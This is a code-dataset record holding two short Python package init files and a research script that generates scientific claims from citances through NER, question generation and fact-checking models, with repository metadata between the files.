from ._20_encdec_part import DecryptedIO
from ._30_encdec_multipart import MultipartEncryptor, decrypt_from_dios
| 30 | 71 | 0.82381 | # SPDX-FileCopyrightText: (c) 2021 Artёm IG <github.com/rtmigo>
# SPDX-License-Identifier: MIT
from ._20_encdec_part import DecryptedIO
from ._30_encdec_multipart import MultipartEncryptor, decrypt_from_dios
| 0 | 0 | 0 |
f29f5bf6f7181d82bf8e1b8f19f689662b5e9ef0 | 97 | py | Python | mort/__init__.py | brycepg/mort | 9d79144ff2fcd68af96b8140ab6d42a6a0e83abc | [
"MIT"
] | 2 | 2019-08-01T15:04:49.000Z | 2021-04-18T01:11:09.000Z | mort/__init__.py | brycepg/mort | 9d79144ff2fcd68af96b8140ab6d42a6a0e83abc | [
"MIT"
] | null | null | null | mort/__init__.py | brycepg/mort | 9d79144ff2fcd68af96b8140ab6d42a6a0e83abc | [
"MIT"
] | null | null | null | """Automatically run post mortem debugging"""
from .mort import main, run
__version__ = "0.9.1"
| 19.4 | 45 | 0.721649 | """Automatically run post mortem debugging"""
from .mort import main, run
__version__ = "0.9.1"
| 0 | 0 | 0 |
fd2dc8edc7e3699bebcc9491b9169fabae740d5a | 22,860 | py | Python | claimgen_entity.py | allenai/scientific-claim-generation | 4b8890e2fbeab443cde43f8f49ba989f8e183a61 | [
"Apache-2.0"
] | 6 | 2022-03-24T04:17:30.000Z | 2022-03-30T17:34:24.000Z | claimgen_entity.py | allenai/scientific-claim-generation | 4b8890e2fbeab443cde43f8f49ba989f8e183a61 | [
"Apache-2.0"
] | null | null | null | claimgen_entity.py | allenai/scientific-claim-generation | 4b8890e2fbeab443cde43f8f49ba989f8e183a61 | [
"Apache-2.0"
] | null | null | null | import argparse
import random
import numpy as np
import torch
import spacy
import scispacy
import json
import os
import pandas as pd
from spacy.training import Example
from tqdm import tqdm
from datasets import Dataset
from functools import partial
from custom_trainer import CustomTrainer
import ipdb
from collections import defaultdict
from scipy.special import softmax
from spacy.util import minibatch, compounding
from generate_claim_variants import kbin
from transformers import pipeline
import transformers
from transformers import (
AutoModelForSeq2SeqLM,
AutoTokenizer,
Seq2SeqTrainingArguments,
HfArgumentParser,
set_seed,
PreTrainedTokenizerBase,
PreTrainedModel,
DataCollatorForSeq2Seq,
AutoModelForCausalLM
)
from ParagraphJointModel.paragraph_model_dynamic import JointParagraphClassifier
from ParagraphJointModel.dataset import SciFactParagraphBatchDataset
from ParagraphJointModel.scifact_joint_paragraph_dynamic_prediction import predict, post_process_stance
from ParagraphJointModel.util import stance2json, rationale2json, merge_json
def qg_data_preprocess(tokenizer, dset, examples):
"""
Data preprocessor for QG model input
:param tokenizer: QG model tokenizer
:param dset: Dataset name, either 'local' for citances or a dataset such as squad
:param examples: The actual data to preprocess
:return: Tokenizer encoded inputs to QG model
"""
if dset == 'local':
inputs = [ctx + ' ' + ans[0]['text'] for ctx, ans in zip(examples['context'], examples['answers'])]
else:
inputs = [ctx + ' ' + ans['text'][0] for ctx, ans in zip(examples['context'], examples['answers'])]
targets = [q for i,q in enumerate(examples['question'])]
model_inputs = tokenizer(inputs, max_length=tokenizer.model_max_length, truncation=True)
# Setup the tokenizer for targets
with tokenizer.as_target_tokenizer():
labels = tokenizer(targets, max_length=tokenizer.model_max_length, truncation=True)
model_inputs["labels"] = labels["input_ids"]
return model_inputs
def q2c_data_preprocess(tokenizer, dset, examples):
"""
Data preprocessor for claim generation model input
:param tokenizer: claim generation model tokenizer
:param dset: Dataset name, either 'citeworth' for citances or a dataset such as squad
:param examples: The actual data to preprocess
:return: Tokenizer encoded inputs to claim generation model
"""
if dset == 'citeworth':
inputs = [ctx + ' ' + ans['text'] for ctx, ans in zip(examples['generated_question'], examples['answer'])]
targets = [''] * len(inputs)
else:
inputs = [q + ' ' + a for q,a in zip(examples['question'], examples['answer'])]
targets = [a for a in examples['turker_answer']]
model_inputs = tokenizer(inputs, max_length=tokenizer.model_max_length, truncation=True)
# Setup the tokenizer for targets
with tokenizer.as_target_tokenizer():
labels = tokenizer(targets, max_length=tokenizer.model_max_length, truncation=True)
model_inputs["labels"] = labels["input_ids"]
return model_inputs
def sort_fc_claims(preds, original_claims):
"""
Scores each claim using the formula:
$$ s = p[support] - p[contradict] $$
Returns the claims sorted by this score in descending order
:param preds: The raw logits from ParagraphJointModel for each evidence sample for each claim
:param original_claims: The original generated claims
:return: Sorted claims with their fact checking score
"""
orig_claim_map = {c['id']: c for c in original_claims}
for p in preds:
all_probs = [softmax(p['evidence'][e]['score']) for e in p['evidence']]
score = max(p[1] - p[2] for p in all_probs)
orig_claim_map[p['id']]['score'] = score
return list(sorted([v for v in orig_claim_map.values()], key=lambda x: x['score'], reverse=True))
def save_ner_model(output_dir, nlp, new_model_name):
"""
Save a spacy model
:param output_dir: Where to save the model
:param nlp: The scispacy model to save
:param new_model_name: New name for the spacy model
:return:
"""
output_dir = f'ner_models/{output_dir}'
if output_dir is not None:
if not os.path.exists(output_dir):
os.makedirs(output_dir)
nlp.meta["name"] = new_model_name
nlp.to_disk(output_dir)
print("Saved model to", output_dir)
def get_named_entities(citances, nlp):
"""
Extract named entities from a set of citances
:param citances:
:param nlp:
:return: List of dicts containing input to question generation model
"""
question_gen_input = defaultdict(list)
for citance_dict in tqdm(citances):
citance = citance_dict['text'] if 'text' in citance_dict else citance_dict['claims']
entities = []
entity_text = []
doc = nlp(citance)
entities.extend(list(doc.ents))
entity_text.extend([e.text for e in doc.ents])
for ent in entities:
answers = [{'text': ent.text, 'type': ent.label_, 'start': ent.start_char, 'pos': [t.pos_ for t in ent]}]
if 'doc_id' in citance_dict:
sample = {'id': citance_dict['doc_id'], 'paper_id': citance_dict['paper_id'],
'context': citance_dict['context'], 'citance': citance, 'answers': answers, 'question': '',
'evidence': citance_dict['evidence']}
else:
sample = {'id': '', 'paper_id': '',
'context': citance_dict['context'], 'citance': citance, 'answers': answers, 'question': '',
'evidence': ''}
for k in sample:
question_gen_input[k].append(sample[k])
return question_gen_input
def run_question_generation(trainer, dset, model, tokenizer, device, num_beams):
"""
Generate a set of questions from a source text and list of answers (named entities)
:param trainer: HuggingFace trainer
:param dset: The dataset to generate questions from
:param model: Question generation model
:param tokenizer: Tokenizer for the provided model
:param device: torch device to run on
:param num_beams: Number of beams for beam search
:return: A list of dicts containing input to the claim generation model
"""
dl = trainer.get_test_dataloader(dset)
all_samples = []
for b in tqdm(dl):
input_ids = b['input_ids'].to(device)
samples = model.generate(
input_ids,
num_beams=num_beams,
max_length=tokenizer.model_max_length,
early_stopping=True
)
all_samples.extend(list(samples.detach().cpu().numpy()))
claim_gen_input = defaultdict(list)
for id, con, ans, q, citance, paper_id, evidence in zip(dset['id'], dset['context'], dset['answers'],
all_samples, dset['citance'], dset['paper_id'],
dset['evidence']):
gen_question = tokenizer.decode(q, skip_special_tokens=True, clean_up_tokenization_spaces=False)
sample = {'id': id, 'paper_id': paper_id, 'context': con, 'answer': ans[0], 'generated_question': gen_question,
'citance': citance, 'evidence': evidence}
for k in sample:
claim_gen_input[k].append(sample[k])
return claim_gen_input
def run_claim_generation(trainer, dset, model, tokenizer, device, num_beams):
"""
Generate a set of claims from a question and list of answers (named entities)
:param trainer: HuggingFace trainer
:param dset: The dataset to generate claims from
:param model: Claim generation model
:param tokenizer: Tokenizer for the provided model
:param device: torch device to run on
:param num_beams: Number of beams for beam search
:return: A list of dicts containing the generated claims and a list of dicts containing the input to external fact
checking model
"""
dl = trainer.get_test_dataloader(dset)
all_samples = []
for b in tqdm(dl):
input_ids = b['input_ids'].to(device)
samples = model.generate(
input_ids,
num_beams=num_beams,
max_length=tokenizer.model_max_length,
early_stopping=True
)
all_samples.extend(list(samples.detach().cpu().numpy()))
generated_claims = []
fc_claim_inputs = []
count = defaultdict(int)
for id, con, ans, q, claim, citance, paper_id, evidence in zip(dset['id'], dset['context'],
dset['answer'], dset['generated_question'],
all_samples, dset['citance'],
dset['paper_id'], dset['evidence']):
gen_claim = tokenizer.decode(claim, skip_special_tokens=True, clean_up_tokenization_spaces=False)
n = count[id]
generated_claims.append(
{'id': f"{id}_{n}", 'paper_id': paper_id, 'context': con, 'citance': citance, 'answer': ans,
'generated_question': q,
'generated_claim': gen_claim, 'evidence': evidence})
fc_claim_inputs.append({'id': f"{id}_{n}", 'claim': gen_claim, 'evidence': {}, 'cited_doc_ids': evidence,
'retrieved_doc_ids': evidence})
count[id] += 1
return generated_claims, fc_claim_inputs
def retrain_ner_model(ner_data, nlp):
"""
Run NER training starting from a given spacy model
:param ner_data: NER training data
:param nlp: Spacy model to start from
:return: Trained spacy model
"""
print(len(ner_data))
random.shuffle(ner_data)
N = int(0.8*len(ner_data))
#Use 20% for validation
ner_training_data = ner_data[:N]
ner_validation_data = ner_data[N:]
pipe_exceptions = ["ner", "trf_wordpiecer", "trf_tok2vec"]
unaffected_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions]
best_f = 0.0
patience = 10
pcounter = 0
with nlp.disable_pipes(*unaffected_pipes):
# Training for 100 iterations w/ early stopping
for iteration in range(100):
# shuufling examples before every iteration
random.shuffle(ner_training_data)
losses = {}
# batch up the examples using spaCy's minibatch
batches = minibatch(ner_training_data, size=compounding(4.0, 32.0, 1.001))
for batch in batches:
#texts, annotations = zip(*batch)
nlp.update(
batch, # batch of annotations
drop=0.1, # dropout - make it harder to memorise data
losses=losses,
)
#print("Losses", losses)
# Get validation scores
f1 = nlp.evaluate(ner_validation_data)['ents_f']
print(f"Eval f1: {f1}")
if f1 > best_f:
best_f = f1
save_ner_model("curriculum_learning", nlp, "cl-model")
pcounter = 0
else:
pcounter += 1
if pcounter == patience:
break
return spacy.load("ner_models/curriculum_learning")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--train_citances", help="Location of the citance data", required=True, type=str)
parser.add_argument("--val_citances", help="Location of the validation citance data", required=True, type=str)
parser.add_argument("--test_citances", help="Location of the test citance data", required=True, type=str)
parser.add_argument("--qg_model_name", help="Name of the model to use for question generation", required=True, type=str)
parser.add_argument("--q2c_model_name", help="Name of the model to use for question generation", required=True, type=str)
parser.add_argument("--fc_model_name", help="Name of the fact checking model", required=True,
default='roberta-large')
parser.add_argument("--fc_model_checkpoint", help="Name of the fact checking model", required=False,
default=None)
parser.add_argument("--external_corpus_file", help="Evidence corpus file", required=True,
type=str)
parser.add_argument("--internal_corpus_file", help="Other paragraphs from citance documents", required=True,
type=str)
parser.add_argument("--seed", help="Random seed", type=int, default=1000)
parser.add_argument("--num_beams", help="Number of beams for beam search", type=int, default=1)
parser.add_argument("--output_dir", help="Directory to output files", required=True, type=str)
args = parser.parse_args()
enforce_reproducibility(args.seed)
# See if CUDA available
device = torch.device("cpu")
if torch.cuda.is_available():
print("Training on GPU")
device = torch.device("cuda:0")
# Setup
nlp = spacy.load('en_core_sci_md')
# QG model setup
qg_model = args.qg_model_name
qg_tokenizer = AutoTokenizer.from_pretrained(qg_model)
qg_model = AutoModelForSeq2SeqLM.from_pretrained(qg_model)
# Q2C model setup
q2c_model = args.q2c_model_name
q2c_tokenizer = AutoTokenizer.from_pretrained(q2c_model)
q2c_model = AutoModelForSeq2SeqLM.from_pretrained(q2c_model)
# FC model setup
fc_tokenizer = AutoTokenizer.from_pretrained(args.fc_model_name)
fc_model = JointParagraphClassifier(args.fc_model_name, 1024,
0.0)
state_dict = torch.load(args.fc_model_checkpoint)
# strict = false because of bert.embeddings.position_ids mismatch
fc_model.load_state_dict(state_dict, strict=False)
# Language model for negative claim generation
lm = AutoModelForCausalLM.from_pretrained('gpt2')
lm_tk = AutoTokenizer.from_pretrained('gpt2')
########### Run NER on input
with open(args.train_citances) as f:
citances = [json.loads(l) for l in f]
with open(args.val_citances) as f:
val_citances = [json.loads(l) for l in f]
with open(args.test_citances) as f:
test_citances = [json.loads(l) for l in f]
ner_data = []
output_claims = []
if not os.path.exists(f"{args.output_dir}"):
os.makedirs(f"{args.output_dir}")
save_dir = f"{args.output_dir}"
question_gen_input = get_named_entities(citances, nlp)
val_question_gen_input = get_named_entities(val_citances, nlp)
test_question_gen_input = get_named_entities(test_citances, nlp)
############ Generate questions from NER
qg_model.to(device)
preprocessor = partial(qg_data_preprocess, qg_tokenizer, 'local')
gen_dset_base = Dataset.from_dict(question_gen_input)
val_gen_dset_base = Dataset.from_dict(val_question_gen_input)
test_gen_dset_base = Dataset.from_dict(test_question_gen_input)
# Filter missing NER
#gen_dset_base = gen_dset_base.filter(lambda example: len(example['answers']) > 0)
gen_dset = gen_dset_base.map(preprocessor, batched=True)
val_gen_dset = val_gen_dset_base.map(preprocessor, batched=True)
test_gen_dset = test_gen_dset_base.map(preprocessor, batched=True)
data_collator = DataCollatorForSeq2Seq(
qg_tokenizer,
model=qg_model,
label_pad_token_id=-100,
padding='longest'
)
qg_trainer = CustomTrainer(
model=qg_model,
tokenizer=qg_tokenizer,
data_collator=data_collator
)
claim_gen_input = run_question_generation(qg_trainer, gen_dset, qg_model, qg_tokenizer, device, args.num_beams)
val_claim_gen_input = run_question_generation(qg_trainer, val_gen_dset, qg_model, qg_tokenizer, device, args.num_beams)
test_claim_gen_input = run_question_generation(qg_trainer, test_gen_dset, qg_model, qg_tokenizer, device, args.num_beams)
qg_model.to('cpu')
############ Generate claims from questions
q2c_model.to(device)
preprocessor = partial(q2c_data_preprocess, q2c_tokenizer, 'citeworth')
gen_dset_base = Dataset.from_dict(claim_gen_input)
val_gen_dset_base = Dataset.from_dict(val_claim_gen_input)
test_gen_dset_base = Dataset.from_dict(test_claim_gen_input)
gen_dset = gen_dset_base.map(preprocessor, batched=True)
val_gen_dset = val_gen_dset_base.map(preprocessor, batched=True)
test_gen_dset = test_gen_dset_base.map(preprocessor, batched=True)
data_collator = DataCollatorForSeq2Seq(
q2c_tokenizer,
model=q2c_model,
label_pad_token_id=-100,
padding='longest'
)
q2c_trainer = CustomTrainer(
model=q2c_model,
tokenizer=q2c_tokenizer,
data_collator=data_collator
)
generated_claims, fc_claim_inputs = run_claim_generation(q2c_trainer, gen_dset, q2c_model, q2c_tokenizer, device, args.num_beams)
val_generated_claims, _ = run_claim_generation(q2c_trainer, val_gen_dset, q2c_model, q2c_tokenizer,
device, args.num_beams)
test_generated_claims, _ = run_claim_generation(q2c_trainer, test_gen_dset, q2c_model, q2c_tokenizer, device,
args.num_beams)
with open(f"{save_dir}/output_test_claims.jsonl", 'wt') as f:
for c in test_generated_claims:
f.write(json.dumps(c) + '\n')
with open(f"{save_dir}/output_scifact_dev_claims.jsonl", 'wt') as f:
for c in val_generated_claims:
f.write(json.dumps(c) + '\n')
q2c_model.to('cpu')
# Run FC model
fc_model.to(device)
#TODO get the data into the right format
fc_dev_set = SciFactParagraphBatchDataset(args.external_corpus_file, fc_claim_inputs,
sep_token=fc_tokenizer.sep_token, k=0, train=False)
rationale_predictions, stance_preds, stance_scores = predict(fc_model, fc_dev_set, 16, args.fc_model_name, fc_tokenizer, device)
rationale_json = rationale2json(fc_dev_set.samples, rationale_predictions)
stance_json = stance2json(fc_dev_set.samples, stance_preds, stance_scores)
stance_json = post_process_stance(rationale_json, stance_json)
merged_json = merge_json(rationale_json, stance_json)
fc_model.to('cpu')
# Rank predictions
sorted_fc_claims = sort_fc_claims(merged_json, generated_claims)
# Get new entities
citance_entity_map = defaultdict(lambda: {'text': '', 'entities': []})
original_claims = [c for c in sorted_fc_claims if c['score'] > 0.5]
for c in original_claims:
citance_entity_map[c['id']]['text'] = c['citance']
citance_entity_map[c['id']]['entities'].append(
(c['answer']['start'], c['answer']['start'] + len(c['answer']['text']), 'ENTITY'))
output_claims.extend(original_claims)
citances = [c for c in citances if c['doc_id'] not in citance_entity_map]
output_claims.extend([c for c in sorted_fc_claims if c['score'] <= 0.5])
with open(f"{save_dir}/added_claims.jsonl", 'wt') as f:
for c in output_claims:
f.write(json.dumps(c) + '\n')
csv_out = []
for c in output_claims:
csv_out.append([c['context'], c['citance'], c['generated_claim'], c['score']])
csv_pd = pd.DataFrame(csv_out, columns=['Context', 'Original Sentence', 'Claim', 'Score'])
csv_pd.to_csv(f"{save_dir}/ranked_claims.csv", index=None)
# Generate training data for fact checking
nli = pipeline('sentiment-analysis', model='roberta-large-mnli', return_all_scores=True, device=0)
# Generate data for scifact training/evaluation
for claim_set in tqdm(test_generated_claims):
neg_claims = kbin([claim_set['generated_claim']], nli, lm, lm_tk, device, 3)
claim_set['neg_claim'] = neg_claims[0][2] if neg_claims[0] is not None else None
# Get corpus so we can pick negative samples for NEI
paper_id_to_paragraph = defaultdict(list)
with open(args.internal_corpus_file) as f:
for l in f:
data = json.loads(l)
paper_id = data['doc_id'].split('_')[0]
paper_id_to_paragraph[paper_id].append(data)
# Pick 1/3 to be supports, 1/3 to be contradicts, and 1/3 to be NEI
inc = incgen()
base_claims_and_evidence = []
for claim_set in test_generated_claims:
# Remove ID suffix to get original paper ID
original_doc_id = claim_set['id']
original_doc_id = original_doc_id[:original_doc_id.rfind('_')]
pos_claim = claim_set['generated_claim']
neg_claim = claim_set['neg_claim']
type = random.randint(0, 2)
if type == 0 or neg_claim == None:
base_claims_and_evidence.append({
'id': next(inc),
'claim': pos_claim,
'evidence': {str(doc_id): [{'sentences': [0], 'label': 'SUPPORT'}] for doc_id in
claim_set['evidence']},
'cited_doc_ids': claim_set['evidence']
})
elif type == 1:
base_claims_and_evidence.append({
'id': next(inc),
'claim': neg_claim,
'evidence': {str(doc_id): [{'sentences': [0], 'label': 'CONTRADICT'}] for doc_id in
claim_set['evidence']},
'cited_doc_ids': claim_set['evidence']
})
elif type == 2:
nei_type = random.randint(0, 1)
if nei_type == 0:
base_claims_and_evidence.append({
'id': next(inc),
'claim': pos_claim,
'evidence': {},
'cited_doc_ids': [original_doc_id]
})
else:
base_claims_and_evidence.append({
'id': next(inc),
'claim': neg_claim,
'evidence': {},
'cited_doc_ids': [original_doc_id]
})
with open(f"{save_dir}/scifact_claims.jsonl", 'wt') as f:
for c in base_claims_and_evidence:
f.write(json.dumps(c) + '\n')
| 42.022059 | 133 | 0.646588 | import argparse
import random
import numpy as np
import torch
import spacy
import scispacy
import json
import os
import pandas as pd
from spacy.training import Example
from tqdm import tqdm
from datasets import Dataset
from functools import partial
from custom_trainer import CustomTrainer
import ipdb
from collections import defaultdict
from scipy.special import softmax
from spacy.util import minibatch, compounding
from generate_claim_variants import kbin
from transformers import pipeline
import transformers
from transformers import (
AutoModelForSeq2SeqLM,
AutoTokenizer,
Seq2SeqTrainingArguments,
HfArgumentParser,
set_seed,
PreTrainedTokenizerBase,
PreTrainedModel,
DataCollatorForSeq2Seq,
AutoModelForCausalLM
)
from ParagraphJointModel.paragraph_model_dynamic import JointParagraphClassifier
from ParagraphJointModel.dataset import SciFactParagraphBatchDataset
from ParagraphJointModel.scifact_joint_paragraph_dynamic_prediction import predict, post_process_stance
from ParagraphJointModel.util import stance2json, rationale2json, merge_json
def enforce_reproducibility(seed=1000):
# Sets seed manually for both CPU and CUDA
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
# For atomic operations there is currently
# no simple way to enforce determinism, as
# the order of parallel operations is not known.
# CUDNN
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
# System based
random.seed(seed)
np.random.seed(seed)
set_seed(seed)
def qg_data_preprocess(tokenizer, dset, examples):
"""
Data preprocessor for QG model input
:param tokenizer: QG model tokenizer
:param dset: Dataset name, either 'local' for citances or a dataset such as squad
:param examples: The actual data to preprocess
:return: Tokenizer encoded inputs to QG model
"""
if dset == 'local':
inputs = [ctx + ' ' + ans[0]['text'] for ctx, ans in zip(examples['context'], examples['answers'])]
else:
inputs = [ctx + ' ' + ans['text'][0] for ctx, ans in zip(examples['context'], examples['answers'])]
targets = [q for i,q in enumerate(examples['question'])]
model_inputs = tokenizer(inputs, max_length=tokenizer.model_max_length, truncation=True)
# Setup the tokenizer for targets
with tokenizer.as_target_tokenizer():
labels = tokenizer(targets, max_length=tokenizer.model_max_length, truncation=True)
model_inputs["labels"] = labels["input_ids"]
return model_inputs
def q2c_data_preprocess(tokenizer, dset, examples):
"""
Data preprocessor for claim generation model input
:param tokenizer: claim generation model tokenizer
:param dset: Dataset name, either 'citeworth' for citances or a dataset such as squad
:param examples: The actual data to preprocess
:return: Tokenizer encoded inputs to claim generation model
"""
if dset == 'citeworth':
inputs = [ctx + ' ' + ans['text'] for ctx, ans in zip(examples['generated_question'], examples['answer'])]
targets = [''] * len(inputs)
else:
inputs = [q + ' ' + a for q,a in zip(examples['question'], examples['answer'])]
targets = [a for a in examples['turker_answer']]
model_inputs = tokenizer(inputs, max_length=tokenizer.model_max_length, truncation=True)
# Setup the tokenizer for targets
with tokenizer.as_target_tokenizer():
labels = tokenizer(targets, max_length=tokenizer.model_max_length, truncation=True)
model_inputs["labels"] = labels["input_ids"]
return model_inputs
def sort_fc_claims(preds, original_claims):
"""
Scores each claim using the formula:
$$ s = p[support] - p[contradict] $$
Returns the claims sorted by this score in descending order
:param preds: The raw logits from ParagraphJointModel for each evidence sample for each claim
:param original_claims: The original generated claims
:return: Sorted claims with their fact checking score
"""
orig_claim_map = {c['id']: c for c in original_claims}
for p in preds:
all_probs = [softmax(p['evidence'][e]['score']) for e in p['evidence']]
score = max(p[1] - p[2] for p in all_probs)
orig_claim_map[p['id']]['score'] = score
return list(sorted([v for v in orig_claim_map.values()], key=lambda x: x['score'], reverse=True))
def save_ner_model(output_dir, nlp, new_model_name):
"""
Save a spacy model
:param output_dir: Where to save the model
:param nlp: The scispacy model to save
:param new_model_name: New name for the spacy model
:return:
"""
output_dir = f'ner_models/{output_dir}'
if output_dir is not None:
if not os.path.exists(output_dir):
os.makedirs(output_dir)
nlp.meta["name"] = new_model_name
nlp.to_disk(output_dir)
print("Saved model to", output_dir)
def get_named_entities(citances, nlp):
"""
Extract named entities from a set of citances
:param citances:
:param nlp:
:return: List of dicts containing input to question generation model
"""
question_gen_input = defaultdict(list)
for citance_dict in tqdm(citances):
citance = citance_dict['text'] if 'text' in citance_dict else citance_dict['claims']
entities = []
entity_text = []
doc = nlp(citance)
entities.extend(list(doc.ents))
entity_text.extend([e.text for e in doc.ents])
for ent in entities:
answers = [{'text': ent.text, 'type': ent.label_, 'start': ent.start_char, 'pos': [t.pos_ for t in ent]}]
if 'doc_id' in citance_dict:
sample = {'id': citance_dict['doc_id'], 'paper_id': citance_dict['paper_id'],
'context': citance_dict['context'], 'citance': citance, 'answers': answers, 'question': '',
'evidence': citance_dict['evidence']}
else:
sample = {'id': '', 'paper_id': '',
'context': citance_dict['context'], 'citance': citance, 'answers': answers, 'question': '',
'evidence': ''}
for k in sample:
question_gen_input[k].append(sample[k])
return question_gen_input
def run_question_generation(trainer, dset, model, tokenizer, device, num_beams):
"""
Generate a set of questions from a source text and list of answers (named entities)
:param trainer: HuggingFace trainer
:param dset: The dataset to generate questions from
:param model: Question generation model
:param tokenizer: Tokenizer for the provided model
:param device: torch device to run on
:param num_beams: Number of beams for beam search
:return: A list of dicts containing input to the claim generation model
"""
dl = trainer.get_test_dataloader(dset)
all_samples = []
for b in tqdm(dl):
input_ids = b['input_ids'].to(device)
samples = model.generate(
input_ids,
num_beams=num_beams,
max_length=tokenizer.model_max_length,
early_stopping=True
)
all_samples.extend(list(samples.detach().cpu().numpy()))
claim_gen_input = defaultdict(list)
for id, con, ans, q, citance, paper_id, evidence in zip(dset['id'], dset['context'], dset['answers'],
all_samples, dset['citance'], dset['paper_id'],
dset['evidence']):
gen_question = tokenizer.decode(q, skip_special_tokens=True, clean_up_tokenization_spaces=False)
sample = {'id': id, 'paper_id': paper_id, 'context': con, 'answer': ans[0], 'generated_question': gen_question,
'citance': citance, 'evidence': evidence}
for k in sample:
claim_gen_input[k].append(sample[k])
return claim_gen_input
def run_claim_generation(trainer, dset, model, tokenizer, device, num_beams):
"""
Generate a set of claims from a question and list of answers (named entities)
:param trainer: HuggingFace trainer
:param dset: The dataset to generate claims from
:param model: Claim generation model
:param tokenizer: Tokenizer for the provided model
:param device: torch device to run on
:param num_beams: Number of beams for beam search
:return: A list of dicts containing the generated claims and a list of dicts containing the input to external fact
checking model
"""
dl = trainer.get_test_dataloader(dset)
all_samples = []
for b in tqdm(dl):
input_ids = b['input_ids'].to(device)
samples = model.generate(
input_ids,
num_beams=num_beams,
max_length=tokenizer.model_max_length,
early_stopping=True
)
all_samples.extend(list(samples.detach().cpu().numpy()))
generated_claims = []
fc_claim_inputs = []
count = defaultdict(int)
for id, con, ans, q, claim, citance, paper_id, evidence in zip(dset['id'], dset['context'],
dset['answer'], dset['generated_question'],
all_samples, dset['citance'],
dset['paper_id'], dset['evidence']):
gen_claim = tokenizer.decode(claim, skip_special_tokens=True, clean_up_tokenization_spaces=False)
n = count[id]
generated_claims.append(
{'id': f"{id}_{n}", 'paper_id': paper_id, 'context': con, 'citance': citance, 'answer': ans,
'generated_question': q,
'generated_claim': gen_claim, 'evidence': evidence})
fc_claim_inputs.append({'id': f"{id}_{n}", 'claim': gen_claim, 'evidence': {}, 'cited_doc_ids': evidence,
'retrieved_doc_ids': evidence})
count[id] += 1
return generated_claims, fc_claim_inputs
def retrain_ner_model(ner_data, nlp):
"""
Run NER training starting from a given spacy model
:param ner_data: NER training data
:param nlp: Spacy model to start from
:return: Trained spacy model
"""
print(len(ner_data))
random.shuffle(ner_data)
N = int(0.8*len(ner_data))
#Use 20% for validation
ner_training_data = ner_data[:N]
ner_validation_data = ner_data[N:]
pipe_exceptions = ["ner", "trf_wordpiecer", "trf_tok2vec"]
unaffected_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions]
best_f = 0.0
patience = 10
pcounter = 0
with nlp.disable_pipes(*unaffected_pipes):
# Training for 100 iterations w/ early stopping
for iteration in range(100):
# shuufling examples before every iteration
random.shuffle(ner_training_data)
losses = {}
# batch up the examples using spaCy's minibatch
batches = minibatch(ner_training_data, size=compounding(4.0, 32.0, 1.001))
for batch in batches:
#texts, annotations = zip(*batch)
nlp.update(
batch, # batch of annotations
drop=0.1, # dropout - make it harder to memorise data
losses=losses,
)
#print("Losses", losses)
# Get validation scores
f1 = nlp.evaluate(ner_validation_data)['ents_f']
print(f"Eval f1: {f1}")
if f1 > best_f:
best_f = f1
save_ner_model("curriculum_learning", nlp, "cl-model")
pcounter = 0
else:
pcounter += 1
if pcounter == patience:
break
return spacy.load("ner_models/curriculum_learning")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--train_citances", help="Location of the citance data", required=True, type=str)
parser.add_argument("--val_citances", help="Location of the validation citance data", required=True, type=str)
parser.add_argument("--test_citances", help="Location of the test citance data", required=True, type=str)
parser.add_argument("--qg_model_name", help="Name of the model to use for question generation", required=True, type=str)
parser.add_argument("--q2c_model_name", help="Name of the model to use for question generation", required=True, type=str)
parser.add_argument("--fc_model_name", help="Name of the fact checking model", required=True,
default='roberta-large')
parser.add_argument("--fc_model_checkpoint", help="Name of the fact checking model", required=False,
default=None)
parser.add_argument("--external_corpus_file", help="Evidence corpus file", required=True,
type=str)
parser.add_argument("--internal_corpus_file", help="Other paragraphs from citance documents", required=True,
type=str)
parser.add_argument("--seed", help="Random seed", type=int, default=1000)
parser.add_argument("--num_beams", help="Number of beams for beam search", type=int, default=1)
parser.add_argument("--output_dir", help="Directory to output files", required=True, type=str)
args = parser.parse_args()
enforce_reproducibility(args.seed)
# See if CUDA available
device = torch.device("cpu")
if torch.cuda.is_available():
print("Training on GPU")
device = torch.device("cuda:0")
# Setup
nlp = spacy.load('en_core_sci_md')
# QG model setup
qg_model = args.qg_model_name
qg_tokenizer = AutoTokenizer.from_pretrained(qg_model)
qg_model = AutoModelForSeq2SeqLM.from_pretrained(qg_model)
# Q2C model setup
q2c_model = args.q2c_model_name
q2c_tokenizer = AutoTokenizer.from_pretrained(q2c_model)
q2c_model = AutoModelForSeq2SeqLM.from_pretrained(q2c_model)
# FC model setup
fc_tokenizer = AutoTokenizer.from_pretrained(args.fc_model_name)
fc_model = JointParagraphClassifier(args.fc_model_name, 1024,
0.0)
state_dict = torch.load(args.fc_model_checkpoint)
# strict = false because of bert.embeddings.position_ids mismatch
fc_model.load_state_dict(state_dict, strict=False)
# Language model for negative claim generation
lm = AutoModelForCausalLM.from_pretrained('gpt2')
lm_tk = AutoTokenizer.from_pretrained('gpt2')
########### Run NER on input
with open(args.train_citances) as f:
citances = [json.loads(l) for l in f]
with open(args.val_citances) as f:
val_citances = [json.loads(l) for l in f]
with open(args.test_citances) as f:
test_citances = [json.loads(l) for l in f]
ner_data = []
output_claims = []
if not os.path.exists(f"{args.output_dir}"):
os.makedirs(f"{args.output_dir}")
save_dir = f"{args.output_dir}"
question_gen_input = get_named_entities(citances, nlp)
val_question_gen_input = get_named_entities(val_citances, nlp)
test_question_gen_input = get_named_entities(test_citances, nlp)
############ Generate questions from NER
qg_model.to(device)
preprocessor = partial(qg_data_preprocess, qg_tokenizer, 'local')
gen_dset_base = Dataset.from_dict(question_gen_input)
val_gen_dset_base = Dataset.from_dict(val_question_gen_input)
test_gen_dset_base = Dataset.from_dict(test_question_gen_input)
# Filter missing NER
#gen_dset_base = gen_dset_base.filter(lambda example: len(example['answers']) > 0)
gen_dset = gen_dset_base.map(preprocessor, batched=True)
val_gen_dset = val_gen_dset_base.map(preprocessor, batched=True)
test_gen_dset = test_gen_dset_base.map(preprocessor, batched=True)
data_collator = DataCollatorForSeq2Seq(
qg_tokenizer,
model=qg_model,
label_pad_token_id=-100,
padding='longest'
)
qg_trainer = CustomTrainer(
model=qg_model,
tokenizer=qg_tokenizer,
data_collator=data_collator
)
claim_gen_input = run_question_generation(qg_trainer, gen_dset, qg_model, qg_tokenizer, device, args.num_beams)
